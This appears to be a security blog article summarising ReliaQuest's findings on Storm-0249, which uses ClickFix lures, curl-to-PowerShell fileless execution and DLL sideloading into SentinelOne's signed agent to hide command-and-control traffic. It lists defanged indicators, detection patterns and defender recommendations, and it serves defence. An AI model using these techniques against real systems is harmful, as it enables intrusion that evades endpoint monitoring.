How Storm-0249 Abuses EDR Trust: A Breakdown of New ReliaQuest Findings

A significant evolution in the tactics of the Initial Access Broker (IAB) "Storm-0249" has been identified in new research released by ReliaQuest. The threat intelligence firm reports that this financially motivated group, historically known for mass phishing campaigns, has pivoted toward a highly surgical post-exploitation strategy.

According to the analysis, Storm-0249 is now weaponizing legitimate Endpoint Detection and Response (EDR) processes—specifically SentinelOne's SentinelAgentWorker.exe—to mask malicious activity. By abusing the trust inherent in signed security binaries, the group effectively bypasses traditional detection, securing a foothold for ransomware affiliates. This report examines the technical findings from ReliaQuest and the implications for defense teams.

Technical Analysis: The Storm-0249 Attack Chain

The ReliaQuest threat research team mapped a distinct attack chain that relies heavily on "living off the land" (LotL) techniques and the abuse of trusted software. The investigation highlights a shift from volume-based attacks to precision evasion. The observed kill chain proceeds as follows:

1. Initial Compromise (ClickFix): The attack initiates via social engineering. Users encounter a "ClickFix" lure—a fraudulent prompt on a phishing site (e.g., sgcipl[.]com) that mimics a Microsoft support page and instructs the user to run a "fix" command.
2. Ingress via Native Tools: The user unknowingly executes curl.exe, a standard Windows utility. ReliaQuest telemetry shows the attackers using this tool to retrieve a payload from a spoofed domain designed to look like a Microsoft subdirectory (/us.microsoft.com/).
3. In-Memory Execution: The curl command pipes the downloaded script directly into PowerShell memory. This fileless execution method avoids writing the initial script to the disk, evading static file scanners.
4. Privilege Escalation: The attackers deploy a malicious MSI package. This installer abuses Windows Installer privileges to execute with SYSTEM-level access, granting the necessary permissions to write files to protected system folders.
5. The Sideloading Setup: The MSI drops a legitimate, signed copy of SentinelAgentWorker.exe into the user’s AppData folder. Crucially, a malicious DLL named SentinelAgentCore.dll is placed alongside it.
6. Execution: When the legitimate SentinelOne executable launches, it unwittingly loads the local, malicious DLL instead of the system version. This executes the attacker's code under the identity of a trusted security process.

Novel Tooling and Indicators of Compromise (IoCs)

The report identifies several specific artifacts that security teams can use to hunt for this activity. ReliaQuest emphasizes that while the technique targets SentinelOne, the vulnerability lies in how Windows handles DLL loading, not in the SentinelOne platform itself.

Key Technical Artifacts:

• Abused Binary: SentinelAgentWorker.exe (Legitimate file used as a host).
• Malicious Library: SentinelAgentCore.dll (The payload containing the attacker's logic).
• Network Indicators: Connections to sgcipl[.]com or hristomasitomasdf[.]com.
• Command Lines: Evidence of curl.exe piping output to powershell.exe, followed by the execution of reg.exe and findstr.exe originating from the SentinelOne process.

Hiding in Plain Sight: Command and Control Evasion

A critical finding in the ReliaQuest report is the method Storm-0249 uses to conceal Command and Control (C2) traffic. By sideloading their code into SentinelAgentWorker.exe, the attackers force the legitimate security agent to handle their network communications.

Network monitoring tools generally whitelist traffic from signed EDR agents, expecting frequent, encrypted communication with cloud management consoles. Storm-0249 exploits this trust. The malicious traffic is encrypted via Transport Layer Security (TLS), blending seamlessly with genuine telemetry.

The researchers note that this renders Deep Packet Inspection (DPI) largely ineffective, as the traffic appears to be routine security operations. Furthermore, the group employs "disposable infrastructure," registering C2 domains mere weeks before an attack to bypass reputation-based filtering systems that flag older or known-bad domains.

Essential Recommendations for Defenders

Based on the tactics observed by ReliaQuest, organizations should prioritize behavioral monitoring over static signatures. The following steps are recommended to counter these evasion techniques:

• Behavioral Anomaly Detection: Configure EDR and SIEM rules to alert when signed security binaries (like SentinelOne) load unsigned or unexpected DLLs, particularly from user-writable directories like %AppData%.
• Restrict curl Usage: Monitor or block instances where curl.exe pipes data directly to PowerShell or CMD. This behavior is rare in legitimate administrative workflows and is a high-fidelity indicator of compromise.
• DNS Monitoring: Scrutinize outbound connections to domains registered within the last 30 to 90 days, especially if the connection originates from a trusted process.
• Isolate on Reconnaissance: Automate host isolation if SentinelAgentWorker.exe (or any security agent) attempts to spawn reg.exe or findstr.exe. This is a clear deviation from normal agent behavior.

Methodology & Attribution

The technical details and telemetry data in this article are derived from ReliaQuest's "Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation." The analysis was conducted by the ReliaQuest Threat Research Team, who worked in conjunction with SentinelOne to validate the findings. The research underscores the importance of monitoring trusted processes for anomalous behavior.

Conclusion

Storm-0249’s shift toward "living off the trusted" tactics represents a sophisticated escalation in the cybercrime ecosystem. As highlighted by the ReliaQuest findings, the ability to commoditize access that is pre-staged with SYSTEM privileges and persistence mechanisms makes this group a valuable enabler for ransomware affiliates. Security leaders must recognize that trusting digital signatures is no longer sufficient; defense strategies must evolve to scrutinize the behavior of trusted applications as rigorously as they do unknown threats.